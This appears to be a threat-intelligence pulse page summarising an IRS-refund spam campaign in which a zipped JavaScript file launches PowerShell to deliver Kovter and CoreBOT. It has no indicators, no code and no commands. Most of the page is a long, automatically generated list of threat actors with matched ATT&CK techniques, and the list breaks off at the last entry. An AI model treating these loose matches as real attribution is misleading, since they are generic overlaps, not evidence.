Trusted Design

IRS Refund-themed Spam Campaign Delivers Kovter and CoreBOT

概要

IOCs derived from post on https://heimdalsecurity.com/blog/security-alert-fileless-kovter-teams-modular-corebot-malware-irs-spam-campaign/ IRS-refund themed spam campaign claiming to be a refund notification from the IRS. The spam email includes a .zip attachment. In that attachment, there is a .js file which will activate Windows PowerShell in order to download the primary payload as soon as the .zip file is opened. The primary payload appears to be Kovter, and the seconday one CoreBOT. Kovter is a Trojan whose primary use was performing click-fraud operations on the PCs it infected. But, earlier this year, Kovter was seen incorporating new cloaking tricks in order to evade detection. Its core assets: the ability to remain hidden and to persist for a longer period in the memory of the compromised machines. CoreBOT is a type of modular malware, which allows cyber criminals to build upon it and has evolved from data-stealing malware to financial malware almost overnight earlier this year.

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

このPulseに関連する脅威アクター (事実ベース)

APT32

Score: 23.81
Matched TTPs:
  • T1113 - Screen Capture
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1105 - Ingress Tool Transfer
  • T1027.007 - Dynamic API Resolution
  • T1556 - Modify Authentication Process
MITREへのリンク →

Turla

Score: 25.16
Matched TTPs:
  • T1113 - Screen Capture
  • T1056.001 - Keylogging
  • T1606.002 - SAML Tokens
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
MITREへのリンク →

Kimsuky

Score: 35.81
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1053.007 - Container Orchestration Job
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1205 - Traffic Signaling
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1537 - Transfer Data to Cloud Account
  • T1526 - Cloud Service Discovery
MITREへのリンク →

Sea Turtle

Score: 9.00
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.013 - Container CLI/API
MITREへのリンク →

Ember Bear

Score: 13.02
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
MITREへのリンク →

Indrik Spider

Score: 11.27
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1003.007 - Proc Filesystem
  • T1546.016 - Installer Packages
MITREへのリンク →

Agrius

Score: 8.72
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1176.001 - Browser Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
MITREへのリンク →

Contagious Interview

Score: 29.40
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1021.006 - Windows Remote Management
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1059.006 - Python
  • T1221 - Template Injection
  • T1556 - Modify Authentication Process
MITREへのリンク →

Sandworm Team

Score: 29.85
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1049 - System Network Connections Discovery
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1546.016 - Installer Packages
MITREへのリンク →

Star Blizzard

Score: 7.52
Matched TTPs:
  • T1033 - System Owner/User Discovery
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
MITREへのリンク →

Lazarus Group

Score: 33.61
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1205 - Traffic Signaling
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1055.005 - Thread Local Storage
  • T1105 - Ingress Tool Transfer
  • T1556 - Modify Authentication Process
MITREへのリンク →

TA577

Score: 3.84
Matched TTPs:
  • T1132.001 - Standard Encoding
MITREへのリンク →

Moonstone Sleet

Score: 15.83
Matched TTPs:
  • T1132.001 - Standard Encoding
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1059.011 - Lua
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Scattered Spider

Score: 9.96
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1136.002 - Domain Account
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
MITREへのリンク →

FIN4

Score: 9.93
Matched TTPs:
  • T1666 - Modify Cloud Resource Hierarchy
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1574.010 - Services File Permissions Weakness
MITREへのリンク →

Winnti Group

Score: 3.29
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
MITREへのリンク →

APT41

Score: 15.18
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Rocke

Score: 19.61
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1059.010 - AutoHotKey & AutoIT
  • T1114.003 - Email Forwarding Rule
  • T1059.011 - Lua
  • T1059.013 - Container CLI/API
  • T1537 - Transfer Data to Cloud Account
  • T1105 - Ingress Tool Transfer
MITREへのリンク →

TeamTNT

Score: 17.62
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1176.001 - Browser Extensions
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

APT28

Score: 22.01
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1105 - Ingress Tool Transfer
  • T1566.003 - Spearphishing via Service
MITREへのリンク →

UNC3886

Score: 17.60
Matched TTPs:
  • T1499.001 - OS Exhaustion Flood
  • T1606.002 - SAML Tokens
  • T1021.006 - Windows Remote Management
  • T1136.002 - Domain Account
  • T1547.015 - Login Items
  • T1218.010 - Regsvr32
MITREへのリンク →

Mustang Panda

Score: 33.30
Matched TTPs:
  • T1053.007 - Container Orchestration Job
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1169 - Sudo
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1526 - Cloud Service Discovery
  • T1055.005 - Thread Local Storage
  • T1105 - Ingress Tool Transfer
  • T1556 - Modify Authentication Process
MITREへのリンク →

FIN13

Score: 11.89
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1105 - Ingress Tool Transfer
MITREへのリンク →

OilRig

Score: 26.03
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1005 - Data from Local System
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1526 - Cloud Service Discovery
  • T1556 - Modify Authentication Process
MITREへのリンク →

LuminousMoth

Score: 10.04
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1105 - Ingress Tool Transfer
MITREへのリンク →

Salt Typhoon

Score: 5.69
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1199 - Trusted Relationship
  • T1556 - Modify Authentication Process
MITREへのリンク →

APT29

Score: 17.23
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1218.009 - Regsvcs/Regasm
  • T1555.004 - Windows Credential Manager
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Play

Score: 5.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
MITREへのリンク →

Aoqin Dragon

Score: 9.47
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

RedCurl

Score: 16.28
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1574.010 - Services File Permissions Weakness
  • T1059.011 - Lua
  • T1105 - Ingress Tool Transfer
MITREへのリンク →

Ke3chang

Score: 17.50
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1176.001 - Browser Extensions
  • T1027.008 - Stripped Payloads
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

FIN7

Score: 29.84
Matched TTPs:
  • T1606.002 - SAML Tokens
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1205 - Traffic Signaling
  • T1011.001 - Exfiltration Over Bluetooth
  • T1564.002 - Hidden Users
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1105 - Ingress Tool Transfer
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Malteiro

Score: 5.75
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1552.003 - Shell History
MITREへのリンク →

APT12

Score: 5.55
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
MITREへのリンク →

Machete

Score: 3.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Elderwood

Score: 6.97
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Transparent Tribe

Score: 7.59
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1105 - Ingress Tool Transfer
MITREへのリンク →

Dragonfly

Score: 8.60
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
MITREへのリンク →

WIRTE

Score: 4.08
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
MITREへのリンク →

RTM

Score: 3.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

APT-C-36

Score: 4.80
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
MITREへのリンク →

CURIUM

Score: 3.43
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Gallmaker

Score: 3.95
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.011 - Lua
MITREへのリンク →

Tropic Trooper

Score: 12.36
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1105 - Ingress Tool Transfer
MITREへのリンク →

Dark Caracal

Score: 4.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

PLATINUM

Score: 5.61
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

menuPass

Score: 6.27
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
MITREへのリンク →

TA551

Score: 6.88
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
  • T1562.011 - Spoof Security Alerting
MITREへのリンク →

HEXANE

Score: 6.01
Matched TTPs:
  • T1087.002 - Domain Account
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
MITREへのリンク →

FIN8

Score: 8.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1556 - Modify Authentication Process
MITREへのリンク →

Threat Group-3390

Score: 23.74
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1218.003 - CMSTP
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
  • T1526 - Cloud Service Discovery
  • T1546.017 - Udev Rules
MITREへのリンク →

BITTER

Score: 5.98
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
MITREへのリンク →

APT37

Score: 12.64
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

LazyScripter

Score: 8.28
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1558 - Steal or Forge Kerberos Tickets
  • T1136.002 - Domain Account
MITREへのリンク →

PROMETHIUM

Score: 8.62
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1547.015 - Login Items
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

TA505

Score: 10.56
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

APT39

Score: 15.47
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1499.002 - Service Exhaustion Flood
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1537 - Transfer Data to Cloud Account
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Higaisa

Score: 7.88
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1546.017 - Udev Rules
MITREへのリンク →

Wizard Spider

Score: 12.74
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1526 - Cloud Service Discovery
  • T1027.007 - Dynamic API Resolution
  • T1556 - Modify Authentication Process
MITREへのリンク →

Magic Hound

Score: 5.80
Matched TTPs:
  • T1087.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Cobalt Group

Score: 5.94
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
MITREへのリンク →

Storm-1811

Score: 9.93
Matched TTPs:
  • T1087.002 - Domain Account
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1567.003 - Exfiltration to Text Storage Sites
MITREへのリンク →

Inception

Score: 4.01
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
MITREへのリンク →

EXOTIC LILY

Score: 5.13
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1218.010 - Regsvr32
MITREへのリンク →

Saint Bear

Score: 7.18
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

FIN6

Score: 7.66
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
  • T1556 - Modify Authentication Process
MITREへのリンク →

Patchwork

Score: 7.82
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

TA459

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
MITREへのリンク →

Nomadic Octopus

Score: 3.85
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
MITREへのリンク →

Gorgon Group

Score: 8.21
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1114.003 - Email Forwarding Rule
  • T1199 - Trusted Relationship
MITREへのリンク →

APT19

Score: 7.78
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

TA2541

Score: 12.15
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
  • T1546.017 - Udev Rules
MITREへのリンク →

Earth Lusca

Score: 22.01
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
MITREへのリンク →

SideCopy

Score: 3.64
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1091 - Replication Through Removable Media
MITREへのリンク →

Mofang

Score: 4.81
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1546.017 - Udev Rules
MITREへのリンク →

Leviathan

Score: 15.51
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
  • T1546.016 - Installer Packages
  • T1546.017 - Udev Rules
MITREへのリンク →

Tonto Team

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
MITREへのリンク →

Andariel

Score: 10.41
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1136.002 - Domain Account
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

BRONZE BUTLER

Score: 18.52
Matched TTPs:
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

APT38

Score: 16.77
Matched TTPs:
  • T1087.002 - Domain Account
  • T1176.001 - Browser Extensions
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1059.012 - Hypervisor CLI
  • T1537 - Transfer Data to Cloud Account
  • T1059.005 - Visual Basic
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

MuddyWater

Score: 14.63
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
  • T1218.010 - Regsvr32
  • T1562.011 - Spoof Security Alerting
  • T1059.013 - Container CLI/API
MITREへのリンク →

Molerats

Score: 6.38
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1546.017 - Udev Rules
MITREへのリンク →

admin@338

Score: 5.68
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1218.010 - Regsvr32
MITREへのリンク →

Gamaredon Group

Score: 24.57
Matched TTPs:
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1205 - Traffic Signaling
  • T1199 - Trusted Relationship
  • T1059.011 - Lua
  • T1547.002 - Authentication Package
  • T1059.013 - Container CLI/API
  • T1546.017 - Udev Rules
MITREへのリンク →

Darkhotel

Score: 14.06
Matched TTPs:
  • T1087.002 - Domain Account
  • T1591.003 - Identify Business Tempo
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1564.002 - Hidden Users
  • T1218.010 - Regsvr32
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

The White Company

Score: 5.21
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

APT33

Score: 6.75
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1556 - Modify Authentication Process
MITREへのリンク →

Silence

Score: 4.91
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Sidewinder

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
MITREへのリンク →

Confucius

Score: 3.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1218.010 - Regsvr32
MITREへのリンク →

BlackTech

Score: 7.16
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1199 - Trusted Relationship
  • T1218.010 - Regsvr32
  • T1526 - Cloud Service Discovery
MITREへのリンク →

Windshift

Score: 7.90
Matched TTPs:
  • T1087.002 - Domain Account
  • T1598.003 - Spearphishing Link
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.011 - Lua
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

Cinnamon Tempest

Score: 10.31
Matched TTPs:
  • T1591.003 - Identify Business Tempo
  • T1176.001 - Browser Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
MITREへのリンク →

Medusa Group

Score: 13.89
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1218.003 - CMSTP
  • T1552.003 - Shell History
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Aquatic Panda

Score: 7.77
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
MITREへのリンク →

Blue Mockingbird

Score: 5.18
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

BlackByte

Score: 7.87
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1059.010 - AutoHotKey & AutoIT
  • T1091 - Replication Through Removable Media
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Carbanak

Score: 5.18
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1199 - Trusted Relationship
  • T1547.002 - Authentication Package
MITREへのリンク →

APT3

Score: 7.77
Matched TTPs:
  • T1176.001 - Browser Extensions
  • T1059.011 - Lua
  • T1218.010 - Regsvr32
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Winter Vivern

Score: 6.39
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

APT1

Score: 6.71
Matched TTPs:
  • T1598.003 - Spearphishing Link
  • T1003.007 - Proc Filesystem
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
MITREへのリンク →

HAFNIUM

Score: 10.13
Matched TTPs:
  • T1027.008 - Stripped Payloads
  • T1049 - System Network Connections Discovery
  • T1105 - Ingress Tool Transfer
MITREへのリンク →

APT5

Score: 3.84
Matched TTPs:
  • T1027.008 - Stripped Payloads
MITREへのリンク →

Chimera

Score: 5.77
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1199 - Trusted Relationship
  • T1027.007 - Dynamic API Resolution
MITREへのリンク →

Volt Typhoon

Score: 13.45
Matched TTPs:
  • T1003.007 - Proc Filesystem
  • T1059.010 - AutoHotKey & AutoIT
  • T1049 - System Network Connections Discovery
  • T1199 - Trusted Relationship
  • T1537 - Transfer Data to Cloud Account
  • T1546.016 - Installer Packages
MITREへのリンク →

ZIRCONIUM

Score: 8.21
Matched TTPs:
  • T1059.010 - AutoHotKey & AutoIT
  • T1558 - Steal or Forge Kerberos Tickets
  • T1547.002 - Authentication Package
  • T1537 - Transfer Data to Cloud Account
MITREへのリンク →

Mustard Tempest

Score: 3.74
Matched TTPs:
  • T1091 - Replication Through Removable Media
  • T1059.012 - Hypervisor CLI
MITREへのリンク →

LAPSUS$

Score: 3.31
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
MITREへのリンク →

Metador

Score: 3.31
Matched TTPs:
  • T1136.002 - Domain Account
  • T1199 - Trusted Relationship
MITREへのリンク →

BackdoorDiplomacy

